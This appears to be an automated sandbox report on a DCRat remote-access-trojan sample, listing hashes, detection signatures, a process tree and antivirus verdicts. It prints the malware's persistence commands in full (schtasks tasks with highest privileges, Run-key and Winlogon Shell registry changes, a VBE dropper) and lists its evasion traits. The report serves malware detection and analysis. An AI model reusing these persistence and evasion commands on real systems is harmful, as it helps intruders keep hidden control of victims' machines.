Windows Analysis Report
H9gMIu2HXi.exe

Overview

General Information

Sample name: H9gMIu2HXi.exe (renamed because original name is a hash value)
Original sample name: 4fb1d8f8dff638f2c9b382f9552b18e2.bin.exe
Analysis ID: 1417539
MD5: 4fb1d8f8dff638f2c9b382f9552b18e2
SHA1: 5bc4dbad7914ceb72dba45d1b1efffba40143653
SHA256: b706a1a67f20b5e029c058de6a1e681a36fea762f69b9d983921d0e47ec2bc6c
Tags: DCRat, exe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • H9gMIu2HXi.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\H9gMIu2HXi.exe" MD5: 4FB1D8F8DFF638F2C9B382F9552B18E2)
    • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • work.exe (PID: 7588 cmdline: work.exe -priverdD MD5: E0A16200BD098799073FCB05E9D31300)
        • dwartg.exe (PID: 7628 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" MD5: 1C051E7154F24C6BEA5788CBE9DCB478)
          • wscript.exe (PID: 7680 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
            • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • SurrogatewebSession.exe (PID: 7784 cmdline: "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe" MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
                • schtasks.exe (PID: 7836 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7860 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7884 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • csc.exe (PID: 7900 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                  • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cvtres.exe (PID: 7984 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
                • schtasks.exe (PID: 8024 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8064 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8096 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8120 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8148 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8172 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7172 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7236 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7268 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7292 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 2564 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 1804 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 6488 cmdline: schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7388 cmdline: schtasks.exe /create /tn "SurrogatewebSession" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 4304 cmdline: schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • cmd.exe (PID: 7596 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • chcp.com (PID: 7528 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                  • w32tm.exe (PID: 7696 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                  • SurrogatewebSession.exe (PID: 7916 cmdline: "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe" MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • vXKtedDiKZHKptbUFqIBdHmZ.exe (PID: 7948 cmdline: "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe" MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • vXKtedDiKZHKptbUFqIBdHmZ.exe (PID: 7964 cmdline: "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe" MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • SurrogatewebSession.exe (PID: 7552 cmdline: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • SurrogatewebSession.exe (PID: 7556 cmdline: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • winlogon.exe (PID: 7568 cmdline: C:\Recovery\winlogon.exe MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • winlogon.exe (PID: 7532 cmdline: C:\Recovery\winlogon.exe MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • vXKtedDiKZHKptbUFqIBdHmZ.exe (PID: 7264 cmdline: "C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe" MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • winlogon.exe (PID: 7832 cmdline: "C:\Recovery\winlogon.exe" MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
    • cmd.exe (PID: 7260 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Recovery\winlogon.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Recovery\winlogon.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Source | Rule | Description | Author | Strings
00000008.00000000.1663208372.0000000000BC2000.00000002.00000001.01000000.0000000D.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000004.00000003.1624273489.0000000006FB2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000004.00000003.1624823463.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000004.00000003.1623801206.00000000066A6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000003.00000003.1620690565.0000000004F96000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Source | Rule | Description | Author | Strings
8.0.SurrogatewebSession.exe.bc0000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
4.3.dwartg.exe.66f46d6.0.raw.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
4.3.dwartg.exe.70006d6.1.raw.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
4.3.dwartg.exe.70006d6.1.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
4.3.dwartg.exe.66f46d6.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ProcessId: 7784, TargetFilename: C:\Recovery\winlogon.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Recovery\winlogon.exe, CommandLine: C:\Recovery\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\winlogon.exe, NewProcessName: C:\Recovery\winlogon.exe, OriginalFileName: C:\Recovery\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\winlogon.exe, ProcessId: 7568, ProcessName: winlogon.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, ParentProcessId: 7628, ParentProcessName: dwartg.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" , ProcessId: 7680, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ProcessId: 7784, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\vXKtedDiKZHKptbUFqIBdHmZ
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ProcessId: 7784, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe", ParentImage: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ParentProcessId: 7784, ParentProcessName: SurrogatewebSession.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline", ProcessId: 7900, ProcessName: csc.exe
Source: Thread created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Recovery\winlogon.exe, SourceProcessId: 7532, StartAddress: FB11FF80, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 7532
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f, CommandLine: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe", ParentImage: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ParentProcessId: 7784, ParentProcessName: SurrogatewebSession.exe, ProcessCommandLine: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f, ProcessId: 7836, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f, CommandLine: schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe", ParentImage: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ParentProcessId: 7784, ParentProcessName: SurrogatewebSession.exe, ProcessCommandLine: schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f, ProcessId: 6488, ProcessName: schtasks.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, ParentProcessId: 7628, ParentProcessName: dwartg.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" , ProcessId: 7680, ProcessName: wscript.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ProcessId: 7784, TargetFilename: C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline
Source: Process started | Author: vburov | Data: Command: C:\Recovery\winlogon.exe, CommandLine: C:\Recovery\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\winlogon.exe, NewProcessName: C:\Recovery\winlogon.exe, OriginalFileName: C:\Recovery\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\winlogon.exe, ProcessId: 7568, ProcessName: winlogon.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe", ParentImage: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ParentProcessId: 7784, ParentProcessName: SurrogatewebSession.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline", ProcessId: 7900, ProcessName: csc.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f, CommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe", ParentImage: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ParentProcessId: 7784, ParentProcessName: SurrogatewebSession.exe, ProcessCommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f, ProcessId: 8120, ProcessName: schtasks.exe
Timestamp: 03/29/24-15:27:21.388590
SID: 2048095
Source Port: 49739
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\Desktop\BudDliLc.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                Source: C:\Users\user\Desktop\LdxTVLQK.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Users\user\Desktop\MFrsFgjH.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Users\user\AppData\Local\Temp\NZDl7DWO67.batAvira: detection malicious, Label: BAT/Runner.IL
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Recovery\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\Desktop\vybNluDs.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeReversingLabs: Detection: 70%
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeReversingLabs: Detection: 70%
                                Source: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exeReversingLabs: Detection: 70%
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeReversingLabs: Detection: 70%
                                Source: C:\Recovery\winlogon.exeReversingLabs: Detection: 70%
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeVirustotal: Detection: 19%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeReversingLabs: Detection: 64%
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeVirustotal: Detection: 58%Perma Link
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\BudDliLc.logVirustotal: Detection: 19%Perma Link
                                Source: C:\Users\user\Desktop\LdxTVLQK.logReversingLabs: Detection: 66%
                                Source: C:\Users\user\Desktop\LdxTVLQK.logVirustotal: Detection: 69%Perma Link
                                Source: C:\Users\user\Desktop\MFrsFgjH.logReversingLabs: Detection: 66%
                                Source: C:\Users\user\Desktop\MFrsFgjH.logVirustotal: Detection: 69%Perma Link
                                Source: C:\Users\user\Desktop\RAtJMMZA.logVirustotal: Detection: 25%Perma Link
                                Source: C:\Users\user\Desktop\TDfrhvdw.logVirustotal: Detection: 9%Perma Link
                                Source: C:\Users\user\Desktop\WslZMRrk.logVirustotal: Detection: 25%Perma Link
                                Source: C:\Users\user\Desktop\aEtIhTbg.logVirustotal: Detection: 9%Perma Link
                                Source: C:\Users\user\Desktop\tRVOBpwv.logVirustotal: Detection: 7%Perma Link
